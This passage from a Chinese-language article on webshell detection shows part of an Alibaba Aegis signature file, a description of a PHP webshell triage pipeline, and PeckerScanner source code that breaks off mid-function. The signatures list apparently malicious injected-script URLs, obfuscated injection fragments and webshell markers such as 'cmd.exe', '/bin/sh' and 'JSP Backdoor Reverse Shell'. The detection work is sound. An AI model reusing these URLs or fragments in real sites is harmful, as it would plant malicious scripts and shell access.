<ITEM>
<STR>http://www.255667.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.259ons.com/bai/azjs/tz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.282283.com/qq/qq.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.333233.com/tz/666.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.334335.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.400378.com/boc/tz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.400378.com/liuh/tz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.4399555.com/xxt2.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.45888888.com/cai/g.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.45888888.com/cai/l.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.494333.com/js/ad2.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.502178.com/fa/tzad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.502178.com/pan/tzad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.502178.com/xh/tzadmin.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.5130555.com/js/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.54bao.com/okok808.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.552577.com/tj.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.55567888.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.55html.com/lh/1.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.55html.com/md/1.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.55html.com/pf/10.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.56568.org/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.56970120.net:8081/mb/js/ad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.577d.com/x.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.598222.com/722700.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.59wu.com/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.64266.com/seo/asp.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.734333.com/js/ad2.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.770138.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.777656.com/1/123.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.7956789.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.7bcpj.info/51.la.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.7bcpt.info/51.la.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.7pkw.info/51.la.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.7xjqp.com/51.la.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.7zryl.com/51.la.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.800281.com/bjl/zs.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.81949.com/ddm/lhc.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.81949.com/ddm/lhc2.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.81949.com/ddm/tyc.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.81949.com/ddm/tz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.878388.com/js/ad2.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/0.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/1.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/520799.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/776600.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/d.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/ooppoo888.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/sjb.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/sjb1.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/3/ym.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/k/9.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/k/bb.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/k/d.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/k/offlinebcwr.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/k/offlinebcxa.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888qx.com/smalltongji/k/onlinebckd.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.888888seo.com/seo/a.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.8kyule.com/tz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.91672.com/js/a1.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.94v587.com/include/js/hz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.955947.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.980970.com/098h/qige.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.980970.com/qige/qige.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.988947.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.99u2.com/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.9shici.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.aa789.cc/456.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ake88.com/fc/tz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ake88.com/jr/tz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.aobo777.com/ad/t.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.aomenxinpujing.pw/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.aqqing.com/cpa/ons.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.aqqing.com/link/link.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.bao-ship.com/tz/zqad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.bbgfw.com/tz/tzad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.bbgfw.com/wbtz/tzad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.bbgfw.com/wstz/tzad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.bc333.info/a.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.bcka.pw/51.la.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.bclk.pw/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.bcwz.pw/51.la.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.bczxw.pw/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.bet365bjl.pw/51.la.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.bobaopen.net/tongji/fckzx.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.bobaopen.net/tongji/hgdedelx.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.bosidao.pw/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.bsjyulecheng.com/z/tzad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.cc0777.com/mb/bc.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.cc0777.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.cc0777.com/tj.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.cfgsw.com/dl/tzad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.com88888.com/408888.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.com88888.com/82888.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.com88888.com/89955.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.de88.net/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.dfmz123.com/cai/cai.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.dubaicai.com/tz/k.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.duyiba.org/js/bc1.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.e23069.com/js1.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.e23069.com/js1.js </STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.fa56888.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.fcssqw.com/cai/l.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.go0qle.com/zq.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.handanrcw.com/ii/uu/tz1.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.handanrcw.com/tz1.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.hbyicheng.com/00448/fcm.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.hbyicheng.com/66671/fcm.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.huashi119.com/0401.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.huashi119.com/am.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.huashi119.com/dedecms.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.huashi119.com/hg.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.huashi119.com/lh.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.itsvo.com/jsbjle/tbjl.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.lezhongle.cc/tz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.lhc888666.com/fp-sc.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.nanbanzm.com/hm8z/fcm.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.nanbanzm.com/qw8z/fcm.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.novnov.com/js/six.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.sinacnzz.com/fc/c.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.sinacnzz.com/qq/qq.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.sjc9.com/js/jquery.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.smallsnews.com/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.t171.com/b8988/fcm.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.t171.com/w2w2/fcm.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.todubo.com/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ttbo777.info/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ttbo999.info/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ursec.net/index/aspcai/top.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ursec.net/index/aspliu/top.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ursec.net/index/aspzi/top.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ursec.net/index/phphe/top.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ursec.net/index/phpliao/top.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.vip-66.com/main/jquery.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.www6661222.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.www6661222.com/tj.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.xgscyd.com/facai/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.xinpaibcw.info/baidu.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.yibotianxia.com/adjs/2012ok.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.yifei.net/12.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.yifei.net/ming.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ylc345.com/cw/fzjf/tzad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ylc345.com/cw/tz.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ylc345.com/k/ceshi/tzad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ylc345.com/k/tzad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ylc345.com/t/fzkm/tzad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ylc345.com/t/tzad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ylc404.com/facai/l.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.ylg.pw/51.la.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.yundingyouhui.info/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.zubawang.com/niu/windy.gif</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.zxkh.net/kjs/top.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>ttwg.pw/mb/style.css</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[type=index.asp&host="&host_name&"&directory="&Branch_directory]]></STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[type=index.php&host=".$host_name."&directory=".$Branch]]></STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR><![CDATA["&Branch_directory_11&"."&Branch_directory_12&"."&Branch_directory_13&"."&Branch_directory_14&"."&Branch_directory_15&"."&Branch_directory_16]]></STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>users.51.la/17138832.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>www.0057888.com/mb/images/style.css</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>www.cc0777.com/mb/images/style.css</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>www6661222.com/mb/images/style.css</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>zzelle.com/mb/public/css/style.css</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://zq.anylm.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>012qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM3456789</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>api.qipaiwu.net/js/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>$S3=$S1(S.$S.prot1a,pa,_3);$S4=$S3($S2($S1(robpr.Q_06.rfnO,o0,q4)))</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>$Branch=$B_1.".".$B_2.".".$B_3.".".$B_4.".".$B_5.".".$B_6.".".$B_7.".".$B_8.".".$B_9.".".$B_10.".".$B_11.".".$B_12.".".$B_13;</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[type=index.php&mbfile=".$mbfile."&titlenum=".$titlenum]]></STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://www.sun8797.com/mb/js.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>$Branch_directory_10=getCode(mt_rand(3,5));</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://byc1888.com/skin/ad.js</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>http://t.cn/Rvx3Kmv</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>$B_d_1.".".$B_d_2.".".$B_d_3.".".$B_d_4.".".$B_d_5.".".$B_d_6</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR><![CDATA[type=index.php&caonima=".$caonima_name."&directory=".$Branch_directory]]></STR>
<NUM>80</NUM>
</ITEM>
</SEO>
<EXT>
<ITEM>php</ITEM>
<ITEM>php4</ITEM>
<ITEM>php5</ITEM>
<ITEM>inc</ITEM>
</EXT>
</language>
<language>
<processor>com.alibaba.security.aegis.webshell.checker.impl.DefaultWebShellChecker</processor>
<threshold>80</threshold>
<WEBSHELL>
<ITEM>
<STR>n1nty</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>request.getParameter("f"))).write(request.getParameter("t").getBytes()</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>request.getParameter("path")</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>request.getRealPath(request.getServletPath())</STR>
<NUM>60</NUM>
</ITEM>
<ITEM>
<STR>Command Window</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>JSP Manage-System</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>JspSpy</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>net localgroup</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>cmd.exe</STR>
<NUM>50</NUM>
</ITEM>
<ITEM>
<STR>Jfolder</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>jshell</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>pwnshell</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>ServerSocket(</STR>
<NUM>70</NUM>
</ITEM>
<ITEM>
<STR>jsp File browser</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>/bin/sh</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>Backdoor</STR>
<NUM>50</NUM>
</ITEM>
<ITEM>
<STR>Runtime.getRuntime()</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>.exec(</STR>
<NUM>30</NUM>
</ITEM>
<ITEM>
<STR>cmd /c</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>"cmd", "/C"</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>kj021320</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>fuckanquangoutezheng</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>document.openfile.action=\"" + curUri + "&curPath=" + pathConvert(curFile.getParent()) + "\" + fileName + \"&fsAction=saveAs\";\n"</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>javascript:delFile('"+folderReplace(file)+"')</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>rt.exec("cmd.exe")</STR>
<NUM>40</NUM>
</ITEM>
<ITEM>
<STR>JSP Backdoor Reverse Shell</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>"\"" + boundary + "\" is an illegal boundary indicator"</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>$Id: TelnetIO.java,v 1.10 1808/02/09 10:22:18 leo Exp $</STR>
<NUM>80</NUM>
</ITEM>
<ITEM>
<STR>void NN(String s</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>void MM(InputStream is</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>void QQ(String cs</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>else if (Z.equals("H"))</STR>
<NUM>20</NUM>
</ITEM>
<ITEM>
<STR>else if(Z.equals("H"))</STR>
<NUM>20</NUM>
</ITEM>
</WEBSHELL>
<EXT>
<ITEM>jsp</ITEM>
</EXT>
</language>
</LEX>
PHP WEBSHELL的检测流程
1. 客户端上报150w次疑似文件发现/日 2. 上报服务端,服务端根据MD5情况进行非重复文件拉取 3. 通过MD5 LIST+文本特征白名单去除一部分误报,这个白名单是安全人员积累添加的,剩下文件: 100w 4. WEBSHELL判定 1) YES_WEBSHELL/DELETE_WEBSHELL: 2w 2) NOT_WEBSHELL: 98w //包括sandbox检测结果
11. Syntax And Lexical Analysis In WEBSHELL Detection(基于词法、语法分析的WEBSHELL检测)
在纯文本WEBSHELL恶意检测中,正则检测比单纯的特征码关键字检测效果更好,但是依然面临大量误报的情况,基于词法、语法分析是另一个很好的思考方向
0x1: 语法语义分析形式
1. 根据php语言扫描编译的实现方式,进行剥离代码、注释 2. 分析变量、函数、字符串、语言结构的分析方式 3. 实现特征字符序列的捕捉方式
0x2: 代码流程
1. 创建Token映射表 protected function createTokenMap() { $tokenMap = array(); // 256 is the minimum possible token number, as everything below // it is an ASCII value for ($i = 256; $i < 1000; ++$i) { // T_DOUBLE_COLON is equivalent to T_PAAMAYIM_NEKUDOTAYIM if (T_DOUBLE_COLON === $i) { $tokenMap[$i] = Pecker_Parser::T_PAAMAYIM_NEKUDOTAYIM; // T_OPEN_TAG_WITH_ECHO with dropped T_OPEN_TAG results in T_ECHO } elseif(T_OPEN_TAG_WITH_ECHO === $i) { $tokenMap[$i] = Pecker_Parser::T_ECHO; // T_CLOSE_TAG is equivalent to ';' } elseif(T_CLOSE_TAG === $i) { $tokenMap[$i] = ord(';'); // and the others can be mapped directly } elseif ('UNKNOWN' !== ($name = token_name($i)) && defined($name = 'Pecker_Parser::' . $name) ) { $tokenMap[$i] = constant($name); } } return $tokenMap; } 2. 遍历目标目录,过滤白名单目录,读取文件内容 3. 排除zend加密文件 if (preg_match('/<\?(php)?\s*@Zend;[\r\n|\n]+\d+;/', $code)) { $this->errMsg = 'Encrypt with Zend optimizer.'; return false; } 4. 调用token_get_all()获取目标文件的Token序列 5. 对Token序列进行规范化处理,去掉空格、注释等杂数据 6. 根据Token序列进行风险检测 1) T_EVAL: 提取出当前整块Token子树 2) T_FUNCTION: 如果当前为下列敏感API,则提取出当前整块Token子树 1) exec 2) system 3) create_function 4) passthru 5) shell_exec 6) proc_open 7) popen 8) copy 9) curl_exec 10) parse_ini_file 11) show_source 12) assert 13) file_put_contents 14) call_user_func_array 15) call_user_func 16) preg_replace 17) include 3) T_VARIABLE: 动态执行WEBSHELL常用的语法形式 3.1) 获取前向Token 3.2) 获取后向Token $ntoken = $this->parser->getNextToken($k); $ptoken = $this->parser->getPreToken($k); if ($ntoken === '(' && $ptoken != '->' && $ptoken !== '::' && $ptoken !== 'function' && $ptoken !== 'new') { $this->report->catchLog($token[1], $token[2],$this->parser->getPieceTokenAll($k)); } 4) T_STRING 5) preg_replace callback代码执行检测 if (isset($this->function[$token[1]])) { $ntoken = $this->parser->getNextToken($k); $ptoken = $this->parser->getPreToken($k); if ($ntoken === '(' && $ptoken != '->' && $ptoken != '::' && $ptoken != 'function') { if($token[1] == 'preg_replace') { $strRegex = $this->parser->getNextToken($k+1); //检测preg_replace的pattern字符串是否包含e修复符 if($this->_hasCallback($strRegex)) { $this->report->catchLog($token[1], $token[2],$this->parser->getPieceTokenAll($k)); } } else { $this->report->catchLog($token[1], $token[2],$this->parser->getPieceTokenAll($k)); } } } 6) case T_INCLUDE 7) T_INCLUDE_ONCE: 8) T_REQUIRE: 9) T_REQUIRE_ONCE: 检测代码是否尝试包含白名单之外的文件类型,这常见于jpg..文件包含WEBSHELL,白名单包括 9.1) php 9.2) inc 9.3) php5 10) complex (curly) syntax: 检测是否包含${${..}}这种语法
0x3: 封装后使用方式
class
<?php /** * Pecker Scanner Lite * * You may not change or alter any portion of this comment or credits * of supporting developers from this source code or any supporting source code * which is considered copyrighted (c) material of the original comment or credit authors. * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. * * The source of this document, reference to PHP-Parser. * * @copyright Pecker Scanner http://www.cnxct.com * @license http://www.fsf.org/copyleft/gpl.html GNU public license * @author CFC4N <cfc4n@cnxct.com> * @package Lexer All * @version $Id: PeckerScanner.lite.php 31 2014-05-27 08:09:52Z cfc4n $ */ class Pecker_Scanner { private $extend = array(); private $parser; private $report; private $function; private $path; private $dropdir = array(); //input target file path which need to be scan function __construct() { set_time_limit(0); define('MAX_STRLEN', 500); //max length value of hash string $config = array( 'extend' => array('php','inc','php5'), 'function' => array('exec','system','create_function','passthru','shell_exec','proc_open','popen','copy','curl_exec','parse_ini_file','show_source','assert','file_put_contents','call_user_func_array','call_user_func','preg_replace','include'), ); $this->setExtend($config['extend']); $this->setFunction($config['function']); $this->parser = new Pecker_Parser(new Pecker_Lexer()); $this->report = new Pecker_Loger(); $this->extend['php'] = true; } /** * set expansion name * @param array $extend */ public function setExtend(array $extend) { foreach ($extend as $v) { $this->extend[trim(trim($v),'.')] = true; } if (!isset($this->extend['php'])) { $this->extend['php'] = true; } } /** * set functions of check list * @param array $function */ public function setFunction(array $function) { foreach ($function as $fun) { $this->function[trim($fun)] = true; } if(!isset($this->function['eval'])) { $this->function['eval'] = true; } } /** * scan files * @param string $file * @return boolean */ public function scanFileContent($file, $fileContent) { $this->report->setFile($file); $bRS = $this->parser->parse($fileContent); if(false === $bRS) { $this->report->errorLog($this->parser->getErrmsg()); return false; } $this->checkTokens($this->parser->getTokens()); } /** * check dangerous functions * @param array $tokens */ private function checkTokens(array $tokens) { $i = 0; $curly = false; $curly_str = ''; $curly_num = 0; //die(var_dump($tokens)); foreach ($tokens as $k => $token) { //var_dump($token); if (!$curly && is_array($token)) { switch ($token[0]) { case T_EVAL: $this->report->catchLog($token[1],$token[2],$this->parser->getPieceTokenAll($k)); break; case T_FUNCTION: if (isset($this->function[$token[1]])) { $this->report->catchLog($token[1],$token[2],$this->parser->getPieceTokenAll($k)); } break; case T_VARIABLE: $ntoken = $this->parser->getNextToken($k); $ptoken = $this->parser->getPreToken($k); if ($ntoken === '(' && $ptoken != '->' && $ptoken !== '::' && $ptoken !== 'function' && $ptoken !== 'new') { $this->report->catchLog($token[1], $token[2],$this->parser->getPieceTokenAll($k)); } elseif ($ntoken === '{' || $ntoken === '[' ) { $nt = $this->parser->getVariableToken($k); if ($nt['token'] === '(') { $this->report->catchLog($token[1].$nt['func'], $token[2],$this->parser->getPieceTokenAll($nt['key']+$k)); } } break; case T_STRING: if (isset($this->function[$token[1]])) { $ntoken = $this->parser->getNextToken($k); $ptoken = $this->parser->getPreToken($k); if ($ntoken === '(' && $ptoken != '->' && $ptoken != '::' && $ptoken != 'function') { if($token[1] == 'preg_replace') { $strRegex = $this->parser->getNextToken($k+1); if($this->_hasCallback($strRegex)) { $this->report->catchLog($token[1], $token[2],$this->parser->getPieceTokenAll($k)); } } else { $this->report->catchLog($token[1], $token[2],$this->parser->getPieceTokenAll($k)); } } } break; case T_INCLUDE: case T_INCLUDE_ONCE: case T_REQUIRE: case T_REQUIRE_ONCE: if (isset($this->function['include']) || isset($this->function['include_once']) || isset($this->function['require']) || isset($this->function['require_once'])) { $infile = $this->parser->getFilepathToken($k); $fileinfo = pathinfo($infile); if (!isset($this->extend[$fileinfo['extension']])) { $this->report->catchLog($token[1], $token[2],$this->parser->getPieceTokenAll($k)); } } break; default: } } elseif ($curly) { //Complex (curly) syntax if (!is_array($token)) { if ($token === '{') { $curly_str .= '{'; $curly_num ++; } elseif($token === '}') { 